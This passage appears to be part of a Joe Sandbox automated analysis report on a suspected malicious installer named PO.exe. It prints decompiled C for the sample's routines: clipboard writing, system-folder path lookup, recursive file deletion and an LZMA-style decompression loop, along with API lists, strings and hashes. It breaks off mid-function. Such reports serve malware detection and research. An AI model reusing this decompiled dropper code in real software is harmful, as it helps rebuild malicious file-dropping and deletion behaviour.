GlobalUnlock.KERNEL32(00000000), ref: 0040578E
SetClipboardData.USER32(0000000D,00000000), ref: 00405799
CloseClipboard.USER32 ref: 0040579F

Strings

(7B, xrefs: 0040570A
{, xrefs: 00405682

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: eb59534d035534922114e87074bc313431370419dc47d72610ca3581fdfcb614
Instruction ID: 3349dadf3efb3a8fdffdb79f187be012afacb07b5928e089a4a7fd9dccbac2fd
Opcode Fuzzy Hash: eb59534d035534922114e87074bc313431370419dc47d72610ca3581fdfcb614
Instruction Fuzzy Hash: 60B15670900608FFDB119FA0DD89EAE3B79FB48354F40847AFA45A61A0CB754E52DF68

Uniqueness

Uniqueness Score: -1.00%

Function 004061A0 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E004061A0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				intOrPtr* _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t48;
				WCHAR* _t49;
				signed char _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				short _t66;
				short _t67;
				short _t69;
				short _t71;
				void* _t81;
				signed int _t85;
				intOrPtr* _t89;
				signed char _t90;
				void* _t98;
				void* _t108;
				short _t109;
				signed int _t112;
				void* _t113;
				WCHAR* _t114;
				void* _t116;

				_t113 = __esi;
				_t108 = __edi;
				_t81 = __ebx;
				_t48 = _a8;
				if(_t48 < 0) {
					_t48 =  *( *0x42921c - 4 + _t48 * 4);
				}
				_push(_t81);
				_push(_t113);
				_push(_t108);
				_t89 =  *0x42a278 + _t48 * 2;
				_t49 = 0x4281e0;
				_t114 = 0x4281e0;
				if(_a4 >= 0x4281e0 && _a4 - 0x4281e0 >> 1 < 0x800) {
					_t114 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t109 =  *_t89;
					if(_t109 == 0) {
						break;
					}
					__eflags = (_t114 - _t49 & 0xfffffffe) - 0x800;
					if((_t114 - _t49 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t98 = 2;
					_t89 = _t89 + _t98;
					__eflags = _t109 - 4;
					_v8 = _t89;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t114 = _t109;
							_t114 = _t114 + _t98;
							__eflags = _t114;
						} else {
							 *_t114 =  *_t89;
							_t114 = _t114 + _t98;
							_t89 = _t89 + _t98;
						}
						continue;
					}
					_t51 =  *((intOrPtr*)(_t89 + 1));
					_t90 =  *_t89;
					_v8 = _v8 + 2;
					_t85 = _t90 & 0x000000ff;
					_t52 = _t51 & 0x000000ff;
					_a8 = (_t51 & 0x0000007f) << 0x00000007 | _t90 & 0x0000007f;
					_v16 = _t52;
					_t53 = _t52 | 0x00008000;
					__eflags = _t109 - 2;
					_v24 = _t85;
					_v28 = _t85 | 0x00008000;
					_v20 = _t53;
					if(_t109 != 2) {
						__eflags = _t109 - 3;
						if(_t109 != 3) {
							__eflags = _t109 - 1;
							if(_t109 == 1) {
								__eflags = (_t53 | 0xffffffff) - _a8;
								E004061A0(_t85, _t109, _t114, _t114, (_t53 | 0xffffffff) - _a8);
							}
							L42:
							_t54 = lstrlenW(_t114);
							_t89 = _v8;
							_t114 =  &(_t114[_t54]);
							_t49 = 0x4281e0;
							continue;
						}
						__eflags = _a8 - 0x1d;
						if(_a8 != 0x1d) {
							__eflags = (_a8 << 0xb) + 0x42b000;
							E0040617E(_t114, (_a8 << 0xb) + 0x42b000);
						} else {
							E004060C5(_t114,  *0x42a248);
						}
						__eflags = _a8 + 0xffffffeb - 7;
						if(_a8 + 0xffffffeb < 7) {
							L33:
							E00406412(_t114);
						}
						goto L42;
					}
					_t112 = 2;
					_t66 = GetVersion();
					__eflags = _t66;
					if(_t66 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42a2c4;
						if( *0x42a2c4 != 0) {
							_t112 = 4;
						}
						__eflags = _t85;
						if(_t85 >= 0) {
							__eflags = _t85 - 0x25;
							if(_t85 != 0x25) {
								__eflags = _t85 - 0x24;
								if(_t85 == 0x24) {
									GetWindowsDirectoryW(_t114, 0x400);
									_t112 = 0;
								}
								while(1) {
									__eflags = _t112;
									if(_t112 == 0) {
										goto L30;
									}
									_t67 =  *0x42a244;
									_t112 = _t112 - 1;
									__eflags = _t67;
									if(_t67 == 0) {
										L26:
										_t69 = SHGetSpecialFolderLocation( *0x42a248,  *(_t116 + _t112 * 4 - 0x18),  &_v12);
										__eflags = _t69;
										if(_t69 != 0) {
											L28:
											 *_t114 =  *_t114 & 0x00000000;
											__eflags =  *_t114;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t114);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t69;
										if(_t69 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t71 =  *_t67( *0x42a248,  *(_t116 + _t112 * 4 - 0x18), 0, 0, _t114); // executed
									__eflags = _t71;
									if(_t71 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t114, 0x400);
							goto L30;
						} else {
							_t87 = _t85 & 0x0000003f;
							E0040604B(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a278 + (_t85 & 0x0000003f) * 2, _t114, _t85 & 0x00000040); // executed
							__eflags =  *_t114;
							if( *_t114 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatW(_t114, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004061A0(_t87, _t112, _t114, _t114, _v16);
							L30:
							__eflags =  *_t114;
							if( *_t114 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t66 - 0x5a04;
					if(_t66 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t114 =  *_t114 & 0x00000000;
				if(_a4 == 0) {
					return _t49;
				}
				return E0040617E(_a4, _t49);
			}

0x004061a0
0x004061a0
0x004061a0
0x004061a6
0x004061ab
0x004061bc
0x004061bc
0x004061c4
0x004061c5
0x004061c6
0x004061c7
0x004061ca
0x004061d2
0x004061d4
0x004061ed
0x004061f0
0x004061f0
0x004063ec
0x004063ec
0x004063f2
0x00000000
0x00000000
0x00406200
0x00406206
0x00000000
0x00000000
0x0040620e
0x0040620f
0x00406211
0x00406215
0x00406218
0x004063d9
0x004063e7
0x004063ea
0x004063ea
0x004063db
0x004063de
0x004063e1
0x004063e3
0x004063e3
0x00000000
0x004063d9
0x0040621e
0x00406221
0x00406230
0x00406236
0x00406239
0x0040623c
0x00406246
0x0040624b
0x0040624d
0x00406251
0x00406254
0x00406257
0x0040625a
0x0040637a
0x0040637e
0x004063b3
0x004063b7
0x004063bc
0x004063c1
0x004063c1
0x004063c6
0x004063c7
0x004063cc
0x004063cf
0x004063d2
0x00000000
0x004063d2
0x00406380
0x00406384
0x0040639a
0x004063a1
0x00406386
0x0040638d
0x0040638d
0x004063ac
0x004063af
0x00406372
0x00406373
0x00406373
0x00000000
0x004063af
0x00406262
0x00406263
0x00406269
0x0040626b
0x00406285
0x00406285
0x0040628c
0x0040628c
0x00406293
0x00406297
0x00406297
0x00406298
0x0040629a
0x004062d6
0x004062d9
0x004062e9
0x004062ec
0x004062f4
0x004062fa
0x004062fa
0x00406357
0x00406357
0x00406359
0x00000000
0x00000000
0x004062fe
0x00406305
0x00406306
0x00406308
0x00406322
0x00406330
0x00406336
0x00406338
0x00406353
0x00406353
0x00406353
0x00000000
0x00406353
0x0040633e
0x00406349
0x0040634f
0x00406351
0x00000000
0x00000000
0x00000000
0x00406351
0x0040630a
0x0040630d
0x00000000
0x00000000
0x0040631c
0x0040631e
0x00406320
0x00000000
0x00000000
0x00000000
0x00406320
0x00000000
0x00406357
0x004062e1
0x00000000
0x0040629c
0x0040629e
0x004062b9
0x004062be
0x004062c2
0x00406361
0x00406361
0x00406365
0x0040636d
0x0040636d
0x00000000
0x00406365
0x004062cc
0x0040635b
0x0040635b
0x0040635f
0x00000000
0x00000000
0x00000000
0x0040635f
0x0040629a
0x0040626d
0x00406271
0x00000000
0x00000000
0x00406273
0x00406277
0x00000000
0x00000000
0x00406279
0x0040627d
0x00000000
0x0040627f
0x0040627f
0x00000000
0x0040627f
0x0040627d
0x004063f8
0x00406403
0x0040640f
0x0040640f
0x00000000

APIs

GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,?,00405314,Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00000000,00000000,00000000), ref: 00406263
GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004062E1
GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004062F4
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406330
SHGetPathFromIDListW.SHELL32(?,Call), ref: 0040633E
CoTaskMemFree.OLE32(?), ref: 00406349
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040636D
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,?,00405314,Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00000000,00000000,00000000), ref: 004063C7

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406367
Software\Microsoft\Windows\CurrentVersion, xrefs: 004062AF
Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll, xrefs: 004061C5
Call, xrefs: 004061CA, 004062AA, 004062CB, 004062E0, 004062F3, 0040630F, 0040633A, 0040636C, 00406372, 0040638C, 004063A0, 004063C0, 004063C6, 004063D2, 00406405

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-2598349432
Opcode ID: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
Instruction ID: 57c77dc533264c97ace6329bd87f7d674c2bea75a5b3d90d15d675b8bae5a73d
Opcode Fuzzy Hash: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
Instruction Fuzzy Hash: 1E611571A00104EBDF209F24CC40AAE37A5AF15314F56817FED56BA2D0D73D8AA2CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040596F Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0040596F(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405C3A(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2c8 =  *0x42a2c8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040617E(0x425730, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405B7E(_t68);
					} else {
						lstrcatW(0x425730, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425730,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040617E(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405927(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004052DD(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2c8 =  *0x42a2c8 + 1;
										} else {
											E004052DD(0xfffffff1, _t68);
											E0040601F(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040596F(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425730 - 0x5c;
					if( *0x425730 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E004064C1(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405B32(_t68);
							_t38 = E00405927(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004052DD(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004052DD(0xfffffff1, _t68);
							return E0040601F(_t67, _t68, 0);
						}
						L30:
						 *0x42a2c8 =  *0x42a2c8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405979
0x0040597e
0x00405987
0x0040598a
0x00405992
0x00405995
0x00405998
0x004059a0
0x004059a2
0x004059a3
0x00000000
0x004059a3
0x004059ae
0x004059b1
0x004059b1
0x004059b1
0x004059b5
0x004059c8
0x004059cf
0x004059d4
0x004059d8
0x004059e8
0x004059da
0x004059e0
0x004059e0
0x004059ed
0x004059f1
0x004059fd
0x00405a03
0x00405a08
0x00405a0e
0x00405a19
0x00405a1f
0x00405a21
0x00405a24
0x00405ace
0x00405ace
0x00405ad2
0x00405ad4
0x00405ad4
0x00405ad4
0x00405ad4
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a2a
0x00405a2a
0x00405a2a
0x00405a32
0x00405a52
0x00405a5a
0x00405a5f
0x00405a66
0x00405a81
0x00405a86
0x00405a88
0x00405aac
0x00405a8a
0x00405a8a
0x00405a8d
0x00405aa1
0x00405a8f
0x00405a92
0x00405a9a
0x00405a9a
0x00405a8d
0x00405a68
0x00405a6e
0x00405a70
0x00405a76
0x00405a76
0x00405a70
0x00000000
0x00405a66
0x00405a34
0x00405a3c
0x00000000
0x00000000
0x00405a3e
0x00405a46
0x00000000
0x00000000
0x00405a48
0x00405a50
0x00000000
0x00000000
0x00000000
0x00405ab1
0x00405ab9
0x00405abf
0x00405abf
0x00405ac8
0x00000000
0x00405ac8
0x004059f3
0x004059fb
0x00000000
0x00000000
0x00000000
0x004059b7
0x004059b7
0x004059b9
0x00405ad9
0x00405adb
0x00405ade
0x00405b2f
0x00405b2f
0x00405b2f
0x00405ae0
0x00405ae3
0x00405aee
0x00405af3
0x00405af5
0x00000000
0x00000000
0x00405af8
0x00405b04
0x00405b09
0x00405b0b
0x00000000
0x00405b26
0x00405b0d
0x00405b10
0x00000000
0x00000000
0x00405b15
0x00000000
0x00405b1c
0x00405ae5
0x00405ae5
0x00000000
0x00405ae5
0x004059bf
0x004059c2
0x00000000
0x00000000
0x00000000
0x004059c2

APIs

DeleteFileW.KERNELBASE(?,?,77373420,77372EE0,00000000), ref: 00405998
lstrcatW.KERNEL32(00425730,\*.*), ref: 004059E0
lstrcatW.KERNEL32(?,0040A014), ref: 00405A03
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,77373420,77372EE0,00000000), ref: 00405A09
FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,77373420,77372EE0,00000000), ref: 00405A19
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AB9
FindClose.KERNEL32(00000000), ref: 00405AC8

Strings

"C:\Users\user\Desktop\PO.exe", xrefs: 0040596F
0WB, xrefs: 004059C8
\*.*, xrefs: 004059DA

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\PO.exe"$0WB$\*.*
API String ID: 2035342205-4022505648
Opcode ID: 650d65efca721ae95f05fec5e6387b525ef9089e97d219b3eee7621c95804d20
Instruction ID: 6c547db7f4d1248ed83a6ec2b2b7cf99957869ea0eb35c9edb1a86952611c1c3
Opcode Fuzzy Hash: 650d65efca721ae95f05fec5e6387b525ef9089e97d219b3eee7621c95804d20
Instruction Fuzzy Hash: 5A41B530A40914A6CB21AB659CC9AAF7678EF41724F20427FF801711D1D77C5986DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 00406846 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00406846() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
